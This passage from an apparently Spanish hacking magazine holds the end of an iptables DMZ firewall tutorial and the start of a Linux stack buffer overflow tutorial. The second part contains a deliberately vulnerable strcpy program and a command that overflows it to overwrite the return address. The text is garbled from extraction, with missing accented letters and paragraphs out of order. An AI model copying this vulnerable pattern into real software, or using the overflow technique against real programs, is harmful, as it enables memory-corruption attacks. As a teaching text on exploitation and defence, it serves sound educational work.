En este punto se encuentran algunas de las caractersticas ms interesantes de nuestro script. Vamos a ir viendo una a una cada una de las lneas de esta parte del script. # incluimos modulo para FTP modprobe ip_conntrack_ftp Linux pretende ser un sistema operativo con cierta modu laridad, lo cual se consigue gracias a ciertos comandos co mo modprobe (man modprobe). Existen una gran cantidad de mdulos que podemos cargar dinmicamente, y estos suelen encontrarse en /lib/modules. Si queremos ver un listado completo de los mdulos que tenemos disponibles para ser cargados, podemos hacer: modprobe -l Desde una shell de root. Para ver los mdulos que tenemos cargados en estos mo mentos: lsmod Tambin slo para root.

38/68

Proteccin con iptables en una red corporativa

Si al instalar nuestra distribucin de Linux escogimos ins talar tambin los paquetes de sources (cdigo fuente), tendremos el cdigo del mdulo ip_conntrack_ftp.c en el directorio /usr/src/linux/net/ipv4/netfilter/. Por si no instalasteis los fuentes, podis ver igualmente el cdigo f u e n t e d e e s t e m d u l o e n http://joshua.raleigh.nc.us/docs/linux2.4.10_html/577570.html. Podemos ver en el fuente cmo analiza los paquetes en busca de PORT o 227, que correspondera respectiva mente a los comandos PORT y PASV (ya que 227 es el cdigo de respuesta de PASV). Tambin analiza los co mandos EPRT (Extender PoRT) y EPSV (Extended PaSsiVe), que no vimos en la serie RAW. Los comandos EPRT y EPSV fueron propuestos en el RFC 2428, para facilitar la futura sustitucin del actual proto colo ipv4 por el nuevo ipv6 (del que ya hablaremos a lo largo del curso). Las direcciones IP de ipv6 son diferentes a las de ipv4, por lo que los actuales comandos PORT y PASV no podran ser directamente portados a ipv6, al utilizar las clsicas direc ciones de 32 bits. Los comandos EPRT y EPSV tienen la misma funcionalidad que sus predecesores, pero aaden adems la posibilidad de utilizar direcciones ipv6. Analicemos, por ejemplo, el comando EPRT. Para conse guir lo que he mencionado, este comando tiene 3 parme tros: EPRT |protocolo|direccinIP|puerto| El primer parmetro, protocolo, puede valer 1 2. En el caso de que sea 1, indicamos que se trata del protocolo ipv4 y, por tanto, igual al clsico PORT que ya conoce mos. Si es un 2, se tratar del protocolo ipv6 y, por tanto, el siguiente parmetro (direccinIP) vendr en el formato de direcciones IP v6. El segundo parmetro, direccinIP, en el caso de que el anterior parmetro sea 1 (ipv4) ser simplemente una direccin IP de las de toda la vida, pero con la diferencia (con respecto al comando PORT) de que los dgitos no ven drn separados por comas, si no por puntos. El tercer y ltimo parmetro, puerto, tendr tambin una diferencia con respecto al comando PORT, y es que no ha br que hacer clculos para hallar el nmero de puerto, si no que ste vendr especificado tal cual. Es decir, aqu tenemos un ejemplo de comando EPRT que hara la misma funcin que un comando PORT 80,15,13,100,10,15: EPRT |1|80.15.13.100|2575| Ya que, como sabemos, el puerto 10,15 del comando PORT se traducira en: 10*256 + 15 = 2575. Al soportar ambos comandos tambin el protocolo ipv4, la idea es que vayan siendo implementados por todos los ser vidores y clientes FTP, para ir preparndonos para un futu ro que est siendo ya implantado. # Habilitamos el forward de paquetes echo 1 > /proc/sys/net/ipv4/ip_forward Las principales responsabilidades de Cerbero sern dos: servir de cortafuegos para todas las redes, y encaminar y reenviar todos los paquetes de una red a otra. Para que pueda hacer esta segunda funcin, tenemos que activar el forward de paquetes, lo cual hacemos escribiendo un sim ple 1 en el archivo /proc/sys/net/ipv4/ip_forward. Probad desde una shell de root a escribir estos dos coman dos: echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward Como veis, lo nico que se hace es escribir un 1 en el ar chivo ip_forward, como si fuese un simple archivo de texto. # Habilitamos proteccion anti-spoofing for f in /proc/sys/net/ipv4/conf/*/rp_filter do echo 1 > $f done Todava nos falta hablar ms sobre ip-spoofing en este curso, pero de momento ya sabemos bastante bien en qu consiste esta tcnica tan verstil, que se suele usar en combinacin con gran cantidad de ataques. Este bucle recorre varios directorios, cada uno correspon diente a un dispositivo de red (eth0, eth1, eth2, y lo, bsi camente). En cada uno de estos directorios tendremos una serie de opciones de configuracin para el correspondiente dispositivo (es decir, una configuracin independiente para cada tarjeta de red). En este caso, nosotros activaremos una opcin que tenemos en el archivo rp_filter. Si escri bimos un 1 en este archivo, impedimos que el dispositivo acepte direcciones IP que no pertenezcan a su red. Esta es una sencilla proteccin contra ip-spoofing, aunque no nos protege contra otras tcnicas, como el source-route spoofing. Cuando hablemos ms en profundidad sobre ip-spoofing mostraremos esto con ms detalle. # Habilitamos proteccion anti-smurf echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts Esto ya lo vimos en el artculo sobre fragmentacin. Escribiendo un 1 en este archivo estamos anulando la res 39/68

Proteccin con iptables en una red corporativa

puesta a pings a la direccin broadcast, lo cual impide que nos convirtamos en un amplificador para un ataque smurf. # Habilitamos proteccion contra source route spoofing echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route Esto lo veremos ms adelante en el curso, cuando hable mos de la tcnica de source-route spoofing. De momen to nos quedamos con la idea de que esta lnea nos permite desactivar la respuesta a datagramas que lleven activadas opciones de enrutamiento explcito, es decir, las opciones LSRR y SSRR. Esto no significa que vayamos a rechazar esos datagra mas, si no simplemente que no responderemos a lo que nos pide esa opcin, es decir, que no seguiremos la ruta especificada en nuestra respuesta. # Registramos marcianos para el proyecto SETI echo 1 > /proc/sys/net/ipv4/conf/all/log_martians Bueno... en realidad el proyecto SETI no tiene mucho que ver con todo esto, pero no he podido resistirme a poner alguna chorrada en este artculo (es que si no, no me que do a gusto). Esta opcin lo que hace es logear cualquier paquete que tenga como direccin IP de origen o destino una direccin imposible. Esto tambin incluye las direcciones IP spo ofeadas, ya que una direccin que no pertenece a la red en la que estamos es en realidad una direccin imposible. Con esto permitimos que el propio Cerbero se haga a si mismo PING, o lo que quiera. Todo el trfico entre Cerbero y el propio Cerbero est permitido. Ahora bien, recomien do que en una mquina como Cerbero, dedicada exclusiva mente a un firewall, no metamos ninguna otra aplicacin, ni mucho menos ninguna clase de servidor. Por tanto, el trfico entre Cerbero y s mismo normalmente ser muy limitado o nulo. An as, no tiene ningn peligro permitir el trfico local, por lo que podemos hacerlo sin miedo (es pero que Murphy no me est leyendo). Como vemos, para identificar el trfico local no hemos uti lizado la opcin -s 127.0.0.1, que sera como decir: trfi co que tenga como IP de origen la direccin de loopback. Aunque tengamos protecciones contra ip-spoofing, sera una temeridad absurda hacer esto, pudiendo directamente reconocer la fuente por el DISPOSITIVO, y no por la direccin IP, que es mucho ms fcil de ser suplantada. Por tanto, en lugar de -s 127.0.0.1 utilizaremos: -i lo. Durante el segundo en que estemos cargando las iptables, nuestra red no funcionar, ya que estaremos rechazando todos los paquetes. Al final del script es imprescindible que no olvidemos elimi nar estas reglas porque, como sabemos, las reglas de ipta bles se ejecutan secuencialmente, por lo que si la primera regla rechaza todo, las dems nunca se ejecutarn.

Empezamos ya con las reglas. Todo lo que hay a partir de aqu podra ser modificado segn fuese cambiando nuestro escenario. Empezamos configurando la tabla NAT, de la cual ya os habl con detalle Vic_Thor. Si recordamos la configuracin de Zeus, ste tena una ta bla NAT que diriga todos los puertos abiertos a una nica IP, que era la de Cerbero. Lo que estaba haciendo Zeus era simplemente pasar la bola, aplazando la cuestin, para que fuese Cerbero quien realmente se encargase del NAT. Como vemos, Cerbero repartir los paquetitos de la si guiente forma: Los paquetes a los puertos 80 y 21 (www, y ftp) para Persefone. Los paquetes a los puertos 5000 a 5005 para que Eolo pueda tener DCC. Los paquetes a los puertos 5010 a 5015 para el DCC de Poseidon. Los paquetes al puerto 4662 para el emule de Poseidon.

Aqu, aparte de establecer la poltica DROP por defecto, es decir, poltica paranoica, estamos utilizando un meca nismo muy sencillo para evitar problemas MIENTRAS esta mos configurando las iptables. El script de iptables normalmente no tardar ms de un segundo en ser cargado en Cerbero (depende de cmo de potente sea la mquina), pero durante ese segundo pue den ocurrir mil cosas. Qu pasar con los paquetes que nos lleguen durante ese segundo? Podra ser el momento ideal para que se nos colasen, y todos los esfuerzos poste riores seran en vano. Mientras el script se esta cargando hemos de asumir que estamos totalmente desprotegidos por lo que, antes de to car nada, tenemos que asegurarnos de que se cierran to das las puertas, y no las abriremos hasta que no hayamos terminado de configurar todo. Para ello, insertamos una regla en la primera posicin de cada cadena (INPUT, OUTPUT, y FORWARD), que directa mente rechace todos los paquetes.

40/68

Proteccin con iptables en una red corporativa

Una vez que ya se han establecido los caminos para cada paquete, luego tendremos que analizar la cadena FORWARD, para ver cmo se trata independientemente cada uno. Por ltimo, tenemos aqu las reglas de enmascaramien to, las cuales son imprescindibles para que el router adsl (Zeus) permita el trfico de todas las mquinas que hay detrs de Cerbero. Con estas reglas, cualquier paquete que tenga como IP de origen alguna que pertenezca a las redes Hades o Gaia, su IP de origen se convertir en la nica que Zeus conoce, que es la IP de Cerbero en la red Olimpo (192.168.1.1). Por si alguien se la con el smbolo \, sirve simplemente para cortar una lnea y poder continuarla en la lnea si guiente (como el guin que usamos en castellano para cortar las palabras). permitimos los mensajes Time Exceeded para que funcio ne el traceroute. El resto de mensajes ICMP pueden ser prescindibles, y cualquier otro mensaje ICMP que se reciba o se enve ser logeado, y podremos encontrarlo fcilmente en el log bus cando la cadena ICMP, ya que hemos incluido ese pre fijo para el log.

Como ya explic Vic_Thor, hay que mantener las conexio nes ya establecidas, y rechazar las invlidas (paquetes con algn parmetro que no se corresponda con ninguna conexin establecida). Por tanto, los paquetes TCP sern analizados slo si son para establecer una nueva conexin (flag SYN), pero una vez que la conexin ya ha sido aceptada, el resto de pa quetes de la misma circularn libremente a travs de nuestras iptables.

Qu ms me queda por decir sobre las reglas de ICMP en iptables despus de todo lo que cont ya en artculos ante riores? Ya sabemos que necesitamos poder recibir mensajes ECHO-REPLY (pong) y enviar mensajes ECHO-REQUEST (ping) para que nos funcionen el PING, el TRACEROUTE, y otras aplicaciones. En cambio, no tenemos porque aceptar recibir mensajes ECHO-REQUEST (ping), ya que quiz no tenemos inters en responder nosotros al ping. Me he ahorrado trabajo al definir unas reglas generales de ICMP para todas las cadenas, pero en realidad habra que definir unas reglas especficas para cada cadena si quere mos ser puristas. Por ejemplo, el PING podra permitirse desde Hades y Gaia hacia Cerbero, para que las mquinas de estas redes pu diesen comprobar que el firewall/router est vivo. Pero no habra motivo para permitir un PING desde la red Olimpo, ya que no tenemos por qu dar ninguna informacin al ex terior, donde estn todos esos hackers malos. Como las consecuencias de esto son mnimas, he preferido ahorrar trabajo y crear unas reglas genricas de ICMP, pe ro insisto en que, si queris perfeccionar vuestro firewall, tendrais que definir reglas independientes para cada posi ble camino. Tambin insisto en que las iptables que tengo yo no son estas, por lo que el hecho de que me haya aho rrado trabajo en las iptables de este artculo, no significa que lo haya hecho en las mas. Os propongo como ejercicio que modifiquis estas iptables para que haya reglas independientes de ICMP para cada cadena. Aparte de los ping y pong tambin tenemos los clicks de playmobil, esto.... quiero decir.... que aparte de los ping y los pong tambin permitimos los mensajes Destination Unreachable, para que funcione el mecanismo de PMTUD que ya hemos visto a lo largo del curso. Tambin

Aqu tenemos un bonito surtido (como los de Cuetara) de diferentes tipos de escaneo de puertos que vamos a fil trar. Todos estos tipos de escaneo los puede hacer la mag nfica herramienta NMAP, y algunos de ellos tambin pue den ser utilizados por otras herramientas. NMAP intenta saltarse los firewalls utilizando, entre otras cosas, diferentes combinaciones de flags TCP. Ya se ha hablado sobre esto en la revista. Con esta serie de reglas estamos rechazando todos los pa quetes que tienen los flags que se sabe que son utilizados para este tipo de escaneos, y por otra parte estamos lo geando el escaneo. Como un escaneo completo suelen ser 65535 paquetes (uno por cada puerto TCP), sera una lo cura almacenar todo esto en el log. Por eso limitamos a que slo guarde registro de 5 de estos paquetes por minu to. Con eso tenemos suficiente para detectar el intento de escaneo, pero sin saturar nuestros logs.

Las tres cadenas anteriores, reglas_icmp, keep_state, y flags_tcp, slo quedaron definidas, pero no se especific en ningn momento sobre qu paquetes deban ser aplica das. En esta seccin de nuestro script indicamos que estas 3 cadenas han de ser aplicadas en todos los sentidos: INPUT, OUTPUT, y FORWARD. Si quisisemos aplicar reglas diferentes de icmp para cada camino, tendramos que eliminar estas reglas, ya que pre valeceran sobre las que pusisemos despus.

41/68

Proteccin con iptables en una red corporativa

Tambin es posible que quisiramos aplicar reglas diferen tes para los flags TCP, permitiendo as por ejemplo que no sotros podamos hacer NMAP al exterior, pero que no nos lo puedan hacer a nosotros desde el exterior. En cambio, las reglas de keep_state si que las necesitare mos siempre para cualquier camino. Propongo como ejercicio tambin que modifiquis esta seccin a vuestro gusto.

Si bien Gaia puede acceder a los servicios de Hades, Hades de ninguna manera puede acceder a Gaia. Precisamente aqu es donde se encuentra la esencia de las redes con DMZ. Una DMZ es bsicamente una zona sus ceptible de ser hackeada. Si un hacker lograse hacerse con el control absoluto de la red DMZ, estaramos perdidos si hubiese algn acceso desde sta hacia la red interna. Ya se nos pueden colar todos los hackers que quieran en nuestros servidores (Hades), que desde ellos no lograrn llegar a nuestra red interna (Gaia), a no ser que consigan adems hackear nuestro firewall (Cerbero). Cmo puede entonces funcionar la comunicacin de Gaia hacia Hades si todo el trfico de Hades hacia Gaia est ce rrado? No tendramos que permitir al menos las respues tas que tenga que enviar Hades a Gaia cuando por ejemplo Eolo se conecta por SSH a Persefone? Pues claro que s, pero esta situacin ya la tenemos con templada en la cadena keep_state. Es Eolo quien enva el paquete SYN que establece la conexin entre Eolo y Persefone. Una vez establecida la conexin, nuestra cade na keep_state prevalecer sobre la regla que tenemos aqu: iptables -A hades_gaia -j DROP Y por qu prevalece? Pues lgicamente, porque la inser tamos antes, concretamente en este punto: iptables -A FORWARD -p tcp -j keep_state Normalmente, si vemos en el log alguna lnea con el prefi jo HADES->GAIA: , que es el que hemos puesto para este camino, tendremos que estar alertas porque es una posible seal de que hemos sido atacados a travs de la DMZ.

En nuestro escenario tenemos 3 redes: Gaia, Hades, y Olimpo. Por tanto, habr 6 posibles caminos entre estas redes: De Gaia a Hades De Gaia a Olimpo De Hades a Gaia De Hades a Olimpo De Olimpo a Gaia De Olimpo a Hades A partir de esta seccin, vamos detallando las reglas que tendr que seguir cada uno de estos 6 caminos. El primero de estos, De Gaia a Hades, es el que describimos aqu. Como sabemos, Gaia es la red interna, y Hades la red DMZ. Tpicamente, en una configuracin con DMZ, la red interna puede tener acceso a la DMZ para poder utilizar los mis mos servicios que la DMZ est dando al exterior (es decir, a Internet o, en nuestro escenario, la red Olimpo, que es la intermediaria directa con Internet). Aparte de poder utilizar los servicios de la DMZ, es tam bin muy tpico que el administrador de sistemas tenga tambin su PC dentro de la red interna, y que se abra al gunas puertecillas para poder administrar remotamente los servidores sin tener que estar yendo de una mquina a otra. En este caso, hemos abierto una administracin re mota del servidor Persefone a travs de SSH, a la cual slo tendr acceso la mquina Eolo. Quiz la lnea mas importante en esta seccin es esta: iptables -A FORWARD -i $gaia -o $hades -j gaia_hades Todo lo que entre por el dispositivo que conecta a la red Gaia (-i $gaia) y salga por el dispositivo que conecta a la red Hades (-o $hades) tendr que atravesar la cadena gaia_hades que acabamos de crear. Una vez ms, insisto en que es ms seguro identificar los caminos por los dispositivos de entrada y salida, ms que por direcciones IP.

Esta es otra seccin que podra ser mejorada enormemen te, y que tambin os dejo como ejercicio. En principio, permito que los servidores de la DMZ tengan acceso total a Internet. As, si en algn momento el admi nistrador se sienta a los mandos para bajar actualizaciones de software, o cualquier otra cosa, no tendr limitado el acceso. En cambio, esta no es la opcin ms segura, y lo mejor sera limitar el acceso al exterior de forma inteligente. As, si alguien llegase a penetrar en algn servidor, tendra muy limitado el acceso al exterior. Qu tal, por poner un ejemplo, limitar la salida del protocolo TFTP? Recordis aquellos sistemas clsicos para meter troyanos en una m quina medio-hackeada?

42/68

Proteccin con iptables en una red corporativa

En una configuracin totalmente paranoica, esto sera im pensable. Pero como estamos considerando una configuracin ms bien domstica, es normal que los usua rios de la red interna utilicen ciertos servicios como IRC, redes P2P, ... As que en primer lugar, por supuesto, tenemos que dejar que pasen las respuestas a nuestras consultas DNS, tal y como vimos antes. Ahora tenemos que recordar el artculo sobre DCC de la serie RAW. Cunto tiempo hace de aquello ya, verdad? En nuestro caso, hemos abierto 6 puertos de DCC para ca da mquina de la red interna. Tanto Eolo como Poseidon tendrn que configurar sus clientes de IRC (mIRC, xchat, o el que sea...) para que el DCC vaya slo a travs de los 6 puertos que tienen asignados. Aparte de esto, slo nos queda el Emule de Poseidon, que necesitar tener abierto el puerto 4662 de TCP para fun cionar correctamente. Por supuesto, todo lo dems tendr que ser rechazado. Aunque en realidad ser difcil que nos lleguen paquetes que no encajen aqu, ya que previamente la tabla NAT se encarg de redireccionar hacia Gaia slo los puertos que ya hemos tratado.

Aqu es donde se encuentra reflejada la funcionalidad de la red DMZ. En primer lugar, para cualquier camino que venga desde Olimpo tenemos que permitir los paquetes que tienen co mo IP de origen la de nuestro servidor DNS (o servido res, si tenemos configurado ms de uno), como protocolo UDP, y como puerto de origen el 53 (el puerto de DNS, llamado con el alias domain). Por supuesto, igual que tenemos que dejar entrar las res puestas a nuestras consultas DNS, tambin tenemos que dejar salir nuestras consultas. Esto sera responsabilidad de los caminos que van hacia Olimpo, y no los que vie nen desde Olimpo, como este. Por ejemplo, el camino an terior, hades_olimpo, iba hacia Olimpo, pero al permitir todo el trfico, implcitamente estamos permitiendo tam bin las consultas DNS. Aparte del DNS, tenemos que permitir la entrada de co nexiones hacia los puertos de ftp y web. El puerto de ssh, por supuesto, no estar abierto hacia la red Olimpo, ya que slo Eolo (que pertenece a la red Gaia) puede admi nistrar remotamente a Persefone.

Aqu de nuevo estamos permitiendo que los usuarios de la red interna tengan acceso de salida total hacia Internet. Tambin os dejo como ejercicio que limitis este acceso, si queris, aunque en general en una red domstica lo ms conveniente ser dejarlo abierto, para que podamos mo vernos a nuestras anchas por Internet desde nuestro PC. En cambio, en una red corporativa, podra ser interesante limitar el acceso de los empleados, para que por ejemplo no puedan conectarse a chats, o a otros servicios no de seados. En cualquier caso, la mejor forma de limitar este acceso al exterior no seran las iptables, si no un proxy, como por ejemplo el famoso Squid que, entre otras cosas, nos per mitir por ejemplo limitar qu paginas web pueden ver los empleados, y cules no (evitamos as una de las mayores prdidas de tiempo de los empleados, que es la pornogra fa).

Aqu creamos 3 nuevas cadenas de reglas, que se aplica rn a cualquier paquete que tenga como IP de destino la del propio Cerbero: una cadena para los paquetes que provienen de la red Olimpo, otra para los de la red Gaia, y otra para los de la red Hades. En el caso de la red Olimpo, slo permitimos que nos trai ga de vuelta la respuesta a las consultas DNS que poda mos hacer desde el propio Cerbero. En realidad, hasta esto podramos quitarlo, ya que normalmente nunca nos senta remos a los mandos de Cerbero para hacer nada, por lo que no hay motivo para necesitar hacer consultas DNS. En el caso de Hades, no permitimos ningn trafico hacia Cerbero, faltara ms... Si hemos dicho que la DMZ (Ha des) es la red potencialmente ms vulnerable, de ninguna manera podemos permitir ningn tipo de acceso desde es ta red hacia el corazn de nuestro sistema de seguridad, que es Cerbero. Si vemos en los logs alguna lnea que empiece por el pre fijo que hemos puesto para este camino, "HADES ->CERBERO: ", entonces s que nos podemos mosquear, porque es probable que alguien haya entrado en la red DMZ, y est intentando penetrar en el firewall a travs de ah. Bastante buenos estamos siendo ya permitiendo que des de la DMZ se pueda hacer ping al firewall (por la cadena

Nuestra configuracin no es muy purista que digamos. Puertos abiertos en la red interna!

43/68

Proteccin con iptables en una red corporativa

reglas_icmp), por lo que sta sera una de las reglas que interesara modificar a la hora de personalizar las reglas de ICMP para cada camino. Por ltimo, con respecto a Gaia, tenemos ms de lo mis mo. En este caso, tericamente, no sera tan grave permi tir algn tipo de acceso hacia Cerbero, pero... para qu? Si no hay ningn motivo por el cual tengamos que comuni carnos desde Gaia hacia Cerbero, mejor cerrar todo y cu rarnos en salud.

Para activar todo el script que hemos creado slo nos falta una cosa: eliminar las reglas de bloqueo que colocamos al principio de cada cadena (INPUT, OUTPUT, y FORWARD). Por tanto, con slo borrar la regla nmero 1 de cada cade na: hop! iptables funcionando. Por cierto! Antes de que me vaya, por si alguien no lo sa be, todas las mquinas de Hades y Gaia tienen que tener como puerta de enlace a Cerbero (con la IP de Cerbero que corresponda segn la red en la que estemos), y como mscara de red 255.255.255.0. Es decir, stas seran las puertas de enlace de cada mquina: Persefone: 192.168.2.1 Eolo: 192.168.3.1 Poseidon: 192.168.3.1

Como ya dije, en principio permitimos que el propio Cerbero pueda hacer consultas DNS, aunque perfectamen te podramos eliminar esta opcin. En cualquier caso... para qu lo bamos a querer, si todo el resto del trfico est cerrado? Como vemos, cerramos todo el trfico desde Cerbero hacia el exterior, as que olvidaos de navegar por Internet desde el firewall.

Autor: PyC (LCo)

44/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

Hola, en primer lugar, presentarme. Soy TuXeD, algunos me conoceris del foro de esta revista, otros no, y a otros probablemente os d igual quien soy, as que mejor sigo explicando Durante varios artculos intentar explicar en qu consisten varios tipos de vulnerabilidades y cmo aprovecharnos de ellas. En especial, vamos a hablar de desbordamientos de buffer, tanto stack-based, como heap-based y bss-based. Tambin veremos qu son las cadenas de formato, los errores de programacin en su uso, y la forma de explotarlos. Por otra parte, debo comentar que todos estos artculos se basan en linux, y todos los ejemplos han sido probados en una mquina con Debian GNU/Linux con kernel 2.6.7. Sin ms prembulos, espero que este primer artculo sobre desbordamientos de buffer en la pila [stack-based] os guste y os sea de utilidad
bss segment: En esta zona de la memoria se alojan las variables no inicializadas de nuestro programa. Es decir, cuando le decimos a nuestro compilador que va mos a usar una variable de cierto tipo, pero no le da mos un valor, lo que hace es reservar su espacio en el segmento bss. Tanto ste como el segmento anterior son de tamao fijo, y se puede escribir en ellos. heap segment: Con este nombre [que viene a signi ficar pila o montn] se llama al segmento de memoria reservado para la memoria dinmica. Cuando un pro gramador no sabe de antemano el tamao de una de terminada variable, sino que depende de los datos del usuario por ejemplo, o de un clculo realizado en tiem po de ejecucin, tiene dos opciones: crear una variable lo suficientemente grande como para albergar los datos necesarios, o bien utilizar la memoria dinmica. Como podis ver, el tamao de este segmento no est prede finido, sino que va variando. En nuestro caso, crece en el mismo sentido que las direcciones de memoria. stack segment: Este segmento es lo que llamamos la pila. Se trata de una estructura de datos en la cual po demos apilar [push] y desapilar [pop] variables de la

Bien, algunos de vosotros probablemente, al leer la presentacin, os habris preguntado Y qu es eso de la pila, heap, bss y todas esas cosas que dice?. Pues todo eso son zonas de la memoria, y eso es lo que voy a expli car en esta seccin. Cuando ejecutamos un programa, la memoria asignada a ste es dividida en cinco segmentos (os pongo los nom bres en ingls porque ser como lo encontraris la mayora de las veces): text o code segment: Como su nombre indica, este segmento contiene el cdigo del programa. Es aqu donde residen las instrucciones en cdigo mquina que componen nuestro programa. Cuando lancemos el pro grama, empezar a ejecutarse desde la primera instruccin de este segmento. Este segmento es de tamao fijo y slo lectura. data segment: Aqu se encuentran las variables glo bales inicializadas de nuestro programa. Cuando al principio de un programa creamos una variable y le da mos un valor, es en este segmento donde va a parar.

45/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

cima de la pila. Puedes verlo como un montn de CDs: puedes poner un CD encima, o quitar el CD que hay arriba del todo, pero no puedes quitar un CD que haya en medio. Esto se usa para las variables locales de las funciones de nuestro programa, para almacenar direc ciones de retorno cuando llamamos a una funcin, etc. Este segmento crece en el sentido opuesto al de las di recciones de memoria, y por tanto, hacia el heap. Cuando aumenta la pila, disminuye el espacio disponi ble para el heap, y viceversa. Ahora que conoces la segmentacin de la memoria de un programa, habrs podido darte cuenta de que dividimos el desbordamiento de un buffer segn se encuentre en la pi la, el segmento heap o el bss, puesto que se explotan de formas distintas. Como ya os he dicho antes, en este ar tculo solamente trataremos los buffer overflow producidos en la pila Antes de empezar a ver lo que pasa cuando desbordamos un buffer, voy a explicar un poco un par de registros del proce sador que vamos a usar. Un registro es un pequeo espacio de memoria del procesador donde se almacenan ciertas va riables. En el caso de los procesadores x86 actuales, los re gistros son de 32 bits, pero pueden ser de 64, y de muchos otros tamaos, dependiendo de la arquitectura. Pues bien, tenemos varios registros dentro de un procesa dor x86: eax,ebx, ecx, ebp, esp, eip y unos cuantos ms. Para lo que vamos a ver, nos basta con saber que el regis tro eip contiene la direccin de la siguiente instruccin que ejecutar nuestro procesador, esp contiene la direccin de la cima de la pila, y ebp la direccin del marco actual. Y bien, Qu es eso del marco? Para explicaros sto, va mos a ver primero qu pasa cuando llamamos a una funcin en nuestro programa. Para llamar a una funcin, primero se guarda en la pila la siguiente instruccin a eje cutar, es decir, el contenido que deber tener el registro EIP al salir de nuestra funcin (direccin de retorno). Seguidamente, se guarda el registro ebp, y despus las variables locales de nuestra funcin. Una vez hecho esto, el puntero ebp toma el valor de la direccin 'base' de las variables de nuestra funcin, es decir, apunta a la direccin de la pila que se encuentra justo encima del puntero ebp anterior. Creo que con el siguiente grfico ser ms senci llo de entender: Como pue de que todo esto no quede muy claro, va mos a ver esto en vi vo y en di recto me diante el siguiente programa: Codigo: #include <stdio.h> int suma(int a,int b){ int suma; suma=a+b; return suma; } int main(){ int x, int y; printf("Dame x e y separados por una coma: "); scanf("%d,%d",&x,&y); printf("La suma es %d \n", suma(x,y)); return 0; } Veamos, en este caso no tenemos variables globales, ni inicializadas ni sin inicializar, por tanto los segmentos de datos y bss estarn vacos. Dentro de la funcin main, te nemos dos variables locales, x e y, que como hemos visto, estarn en la pila [1]. Luego, cuando llamemos a su ma(x,y), lo primero que meteremos en la pila son los ar gumentos de la funcin suma, y detrs de ellos, las direc ciones de retorno (eip siguiente, que apunta a la instruccin return 0) y de inicio del marco (ebp) [2]. Seguidamente, se cambiar ebp (apuntando a la cima ac tual de la pila), y se meter en la pila la variable local su ma [3]. As pues, el esquema de la pila ser como sigue:

Como ves, el ebp ahora est apuntando a la base del espa cio de memoria de la funcin suma, es decir, justo debajo de la primera de sus variables locales. Como he dicho an tes, ebp delimita el marco de una funcin, por tanto pode mos ver el marco de la funcin como una especie de Ven tana de la memoria, donde se encuentran sus propias va riables. Cuando una funcin termina, debe dejar la pila tal y como se encontraba justo antes de su ejecucin, por tanto debe haber retirado de la pila todas sus variables lo cales. Seguidamente se restablecen los valores de ebp y eip, y se retiran de la pila los argumentos de la funcin. As, todo ha vuelto a su normalidad y el programa conti nuar como si la llamada a la funcin no fuese ms que una simple instruccin. Bien, ahora que ya sabemos lo que pasa en la pila, pense mos un poco... qu pasara si modificramos el valor de la direccin de retorno? Como ves, al finalizar la funcin, el programa saltara a la direccin que nosotros hubise mos puesto. Y si conseguimos poner el cdigo que quera

46/68

BUFFER Overflow - BUFFER Overflow - BUFFER Overflow

mos en memoria, y cambiamos la direccin de retorno pa ra que salte a dicho cdigo? Pues eso es lo que vamos a hacer en este artculo. Vamos a verlo la orden cat bof.c, que simplemente muestra por pantalla el contenido del archivo bof.c. Adems, perl nos permite repetir una cadena tantas veces como queramos, mediante el uso del operador x. Si le da mos la orden print Ax1000, el intrprete de perl imprimi r por pantalla 1000 veces la letra A. Esto nos puede ayu dar a probar la capacidad del buffer, variando el nmero de letras que le pasamos como parmetro a nuestro pro grama. Veamos qu nos devuelve al meter 600 veces la letra A: tuxed@athenea:~/Articulos HxC$ ./bof `perl -e 'print "A"x600'` AAAAAAAAAAAAAAAAAAA(muchas A) Violacin de segmento tuxed@athenea:~/Articulos HxC$ Violacin de segmento ? Qu significa eso? Pues eso sig nifica que nuestro programa ha intentado acceder a una zona de la memoria que no le pertenece, y por tanto el sis tema operativo no le deja. Segn lo explicado en la parte de conceptos tericos, si desbordamos el buffer podemos llegar a modificar la direccin de retorno de nuestra funcin, y el programa intentar saltar a dicha direccin. En este caso, lo que hemos hecho ha sido rellenar la direccin de retorno con A's, con lo que ha quedado la direccin 0x41414141, y cuando nuestro programa ha in tentado saltar all, el sistema le ha dicho que no es una direccin vlida y lo ha terminado. Ahora bien, por qu no intentamos afinar un poco ms, a ver cual es el mnimo nmero de caracteres que desborda el buffer? Pues vamos probando, y llegaremos a un momento en el que no des borde, as que ese ser nuestro lmite, en mi caso 524 es la frontera. Podemos suponer que en este momento se ha modificado el valor de la direccin de retorno. Vamos a ver si es ver dad con la ayuda del depurador gdb. Para ello, ejecutare mos nuestro programa en el depurador y con la orden x (examine) miraremos qu hay en la direccin de memoria donde se ha guardado la direccin de retorno. Si miramos en la imagen anterior, que ilustra la disposicin de la pila al llamar a una funcin, vemos que lo que queremos mirar est justo por debajo del ebp guardado, que es la direccin apuntada por el registro ebp. Si tenemos en cuenta que la pila aumenta hacia direcciones de memoria decrecientes, la direccin que buscamos es la del registro ebp ms el tamao del puntero ebp guardado, que es de 4 bytes. As pues, tenemos que mirar en ebp+4.

Bueno, como he dicho en el prrafo anterior, ahora que ya sabemos un poquito de teora, y ya sabemos lo que puede pasar si desbordamos el buffer, vamos a verlo en la prc tica. Para ello, usaremos el siguiente programita ejemplo: Cdigo bof.c: #include <stdio.h> #include <string.h> int main(int argc, char *argv[]){ char mensaje[512]; if(argc<2){ printf("Uso: %s <mensaje>\n",argv[0]); return -1; } else { strcpy(mensaje,argv[1]); printf("%s\n",mensaje); } return 0; } Como veis, es un programita chorra que nicamente muestra un mensaje con el argumento que le hemos pasa do como parmetro. Compilamos y lo probamos: tuxed@athenea:~/Articulos HxC$ gcc bof.c -o bof -g tuxed@athenea:~/Articulos HxC$ ./bof Uso: ./bof <mensaje> tuxed@athenea:~/Articulos HxC$ ./bof hola hola tuxed@athenea:~/Articulos HxC$ Pues s, parece que funciona como debe. Pero nosotros va mos a jugar con l, y vamos a meterle ms de 512 carac teres. Lo haremos con perl, y gracias a la sustitucin de comandos de bash. Si ponemos en la shell un comando entre acentos graves, entonces sustituir la lnea de nues tro comando por la salida del comando que hemos puesto entre acentos. Veamos un ejemplo: tuxed@athenea:~/Articulos HxC$ `perl -e 'print "cat bof.c"'` #include <stdio.h> #include <string.h> ... tuxed@athenea:~/Articulos HxC$ 